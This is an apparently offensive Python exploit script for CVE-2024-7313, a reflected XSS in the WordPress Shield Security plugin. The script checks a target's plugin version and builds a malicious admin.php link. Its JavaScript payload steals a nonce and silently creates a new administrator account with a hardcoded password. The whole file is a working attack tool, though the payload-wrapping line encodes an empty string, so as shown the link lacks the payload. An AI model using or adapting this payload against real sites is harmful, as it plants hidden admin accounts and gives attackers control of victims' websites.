import sys import urllib.parse import requests from bs4 import BeautifulSoup # Color codes for terminal output red = '\033[91m' green = '\033[92m' yellow = '\033[93m' blue = '\033[96m' purple = '\033[95m' reset = '\033[0m' # Banner and vulnerability information - Displayed at the start of the script def print_banner(): print(f"""{red} ############################################################################# # # # # # ______ _______ ____ ___ ____ _ _ _____ _____ _ _____ # # / ___\ \ / | ____| |___ \ / _ |___ \| || | |___ |___ // |___ / # # | | \ \ / /| _| _____ __) | | | |__) | || |_ _____ / / |_ \| | |_ \ # # | |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ / ___) | |___) | # # \____| \_/ |_____| |_____|\___|_____| |_| /_/ |____/|_|____/ # # # # Shield Security Plugin Vulnerability (CVE-2024-7313) # # Reflected XSS in WordPress Shield Security Plugin # # Versions Affected: < 20.0.6 # # Risk: High # # Discovered by: Wayne-Kerr # # Published: August 7, 2024 # ############################################################################# {reset}""") # Help menu - Provides instructions when '-h' or '--help' is used def print_help(): print(f"""{yellow} Usage: python3 exploit.py Example: python3 exploit.py http://example.com Options: -h, --help Show this help message and exit {reset}""") # Format the target URL - Ensures the URL starts with "http://" or "https://" def format_target_url(target_url): if target_url.startswith("http://") or target_url.startswith("https://"): return target_url else: return f"http://{target_url}" # Check if the target is vulnerable by accessing the wp-login.php page def check_vulnerability(target_url): try: response = requests.get(f"{target_url}/wp-login.php") if response.status_code == 200: # Try to extract version information from the response version_info = response.text.split("ver=")[-1].split("\"")[0] version = version_info.split(".") major_version = int(version[0]) minor_version = int(version[1]) patch_version = int(version[2].split('&')[0]) # Check if the version is below 20.0.6 if major_version < 20 or (major_version == 20 and minor_version == 0 and patch_version < 6): print(f"{green}Shield Security version is vulnerable. Let's continue.{reset}") return True else: print(f"{yellow}Version not vulnerable.{reset}") return False else: print(f"{red}Failed to retrieve the version information.{reset}") return False except Exception as e: print(f"{red}Error occurred while checking vulnerability: {e}{reset}") return False # Generate the XSS payload URL that exploits the vulnerability def generate_xss_payload(target_url, username, email, first_name, last_name): # Hardcoded password for the new admin account to be created hardcoded_password = "HaxorStrongAFPassword123!!" # The payload template for the XSS attack payload_template = ( "var xhrNonce = new XMLHttpRequest(); " "xhrNonce.open('GET', '/wp-admin/user-new.php', true); " "xhrNonce.onload = function() {{ " "if (xhrNonce.status === 200) {{ " "var nonce = xhrNonce.responseText.match(/name=\"_wpnonce_create-user\" value=\"([a-zA-Z0-9]+)\"/)[1]; " "var xhr = new XMLHttpRequest(); " "xhr.open('POST', '/wp-admin/user-new.php', true); " "xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); " "xhr.setRequestHeader('Referer', '{target}/wp-admin/user-new.php'); " "xhr.setRequestHeader('Origin', '{target}'); " "var params = 'action=createuser&_wpnonce_create-user=' + nonce + " "'&_wp_http_referer=%2Fwp-admin%2Fuser-new.php" "&user_login={username}&email={email}" "&first_name={first_name}&last_name={last_name}&url=test" "&pass1={password}&pass2={password}&role=administrator" "&createuser=Add+New+User'; " "xhr.send(params); " "xhr.onload = function() {{ " "if (xhr.status == 200) {{ " "console.log('Admin user created successfully'); " "window.location.href = '{target}/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=overview'; " "}} else {{ console.log('Error occurred: ' + xhr.statusText); }} " "}}; " "}} else {{ console.log('Error fetching nonce: ' + xhrNonce.statusText); }} }}; " "xhrNonce.send();" ) # Formatting the payload with the provided details payload = payload_template.format( target=target_url, username=username, email=urllib.parse.quote(email), first_name=first_name, last_name=last_name, password=urllib.parse.quote(hardcoded_password) ) # URL encode the payload and generate the full URL for the XSS attack encoded_payload = urllib.parse.quote(f"") full_url = f"{target_url}/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub={encoded_payload}" return full_url if __name__ == "__main__": try: # Print the banner print_banner() # Check for help menu flag and print help if necessary if len(sys.argv) != 2 or sys.argv[1] in ['-h', '--help']: print_help() sys.exit(0) # Get the target URL from the command-line argument raw_target_url = sys.argv[1] target_url = format_target_url(raw_target_url) # Check if the target is vulnerable if not check_vulnerability(target_url): sys.exit(1) # Get user input for the new admin account details username = input(f"{blue}Enter username: {reset}") email = input(f"{blue}Enter email: {reset}") first_name = input(f"{blue}Enter first name: {reset}") last_name = input(f"{blue}Enter last name: {reset}") # Display the hardcoded password hardcoded_password = "HaxorStrongAFPassword123!!" print(f"\n{yellow}Using hardcoded password: {hardcoded_password}{reset}") # Generate and display the XSS payload URL xss_payload_url = generate_xss_payload(target_url, username, email, first_name, last_name) print(f"\n{green}Generated XSS Payload URL: {xss_payload_url}{reset}") # Handle keyboard interruption except KeyboardInterrupt: print(f"\n{red}Script interrupted by user.{reset}") sys.exit(1) # Catch any other exceptions and display an error message except Exception as e: print(f"{red}An error occurred: {e}{reset}") sys.exit(1)